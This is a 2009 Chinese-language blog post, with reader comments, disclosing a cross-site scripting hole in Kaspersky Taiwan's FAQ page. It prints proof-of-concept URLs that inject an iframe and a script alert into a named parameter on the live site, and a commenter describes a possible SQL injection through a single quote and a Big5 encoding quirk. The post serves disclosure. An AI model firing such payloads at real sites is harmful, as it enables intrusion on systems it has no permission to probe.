台灣卡巴斯基網站存在XSS安全漏洞
2009 年 07 月 11 日 – 15:53:10台灣卡巴斯基網站存在XSS (Cross-Site Scripting) 安全漏洞。
跨站腳本攻擊(XSS):駭客利用網站上允許使用者輸入 字元或字串的欄位插入HTML與Script語言,造成其他正常使用者在觀看網頁的同時,瀏覽器會主動下載並執行部份惡意的程式碼,或被暗地裡導入到惡意 的網站,而受到某種型態的影響。如今大部份的網站都強調所謂與使用者互動的功能,加入許多允許使用者輸入字串的欄位,如:留言板、討論區、查詢欄位等;有 些互動的功能能將使用者輸入的字串存入後端資料庫,如果駭客輸入某些含有攻擊式的語言,一旦使用者進入此頁面時,因執行未預期的動作而將遭受某種程度的威 脅。
至於我怎麼發現的呢?
7月8日收到「奕瑞資安快訊第五期」,如下圖所示:
我點擊熱門FAQ其中一則「關於卡巴斯基防毒軟體發生中斷,重新啟動時出現上一個應用程式啟動失敗訊息」,結果出現下圖畫面:
感覺上,網頁中應該存在某些問題,所以,就測試了一下,結果出現下圖畫面:
測試語法,如下所示:
http://web.kaspersky.com.tw/KL-Services/FAQ/Kav2009/kav2009_44.php?faq_name=%22%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E&faq_no=317&faq_checksum=7115&faq_product=18&faq_id_no=5
其他問題,就靠他們自己找囉!
“台灣卡巴斯基網站存在XSS安全漏洞” 目前有 4 迴響
http://web.kaspersky.com.tw/KL-Services/FAQ/Kav2009/kav2009_44.php?faq_name=%27&faq_no=317&faq_checksum=7115&faq_product=18&faq_id_no=5
可能還存在SQL注入漏洞?
過濾 雙引號、反斜線,就是沒關鍵的單引號XD
我稍為研究一下,那存在一個編碼的問題
在URL被UTF-8碼處理過後,由於目標資料庫採用big5編碼處理。
在送出「關於卡巴斯基防毒軟體發生中斷,重新啟動時出現上一個應用程式啟動失敗訊息」的連結時
由於 "息" 字為 E6 81 AF 編碼,最後的AF編碼和單引號 (27)解釋成 AF 27 的Big5編碼處理
而少了後單引號導致SQL語法無法解釋而發生錯誤
By 狼圖騰 on 2009 年 07 月 11 日 - 18:32:11
附上友情檢測XSS語法:
http://web.kaspersky.com.tw/KL-Services/FAQ/Kav2009/kav2009_44.php?faq_name=%22%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E&faq_no=317&faq_checksum=7115&faq_product=18&faq_id_no=5
By zero on 2009 年 07 月 11 日 - 18:48:16
我一直都使用小紅傘網路安全(今年8月17日就滿1年),可是已經 發生2次yahoo信箱亂寄
信的現象(已換新的密碼,還會發生),我今天就解除小紅傘網路安全,改用卡巴斯基來掃
毒,一下子就掃出5隻木馬程式,我有個疑 問就是我正常在更新小紅傘網路安全及定期掃
毒,理論上之前沒有發現木馬,更新及定期掃毒之後,應該會發現那5隻木馬程式,為什麼
小紅傘網路安全一直都沒有 發現那5隻木馬程式,能不能麻煩解答我內心的疑問,謝謝?
By ben on 2010 年 06 月 6 日 - 21:17:33
請改用Dr.Web大蜘蛛防毒軟體:http://www.drweb.tw
By Roger on 2010 年 10 月 31 日 - 10:46:16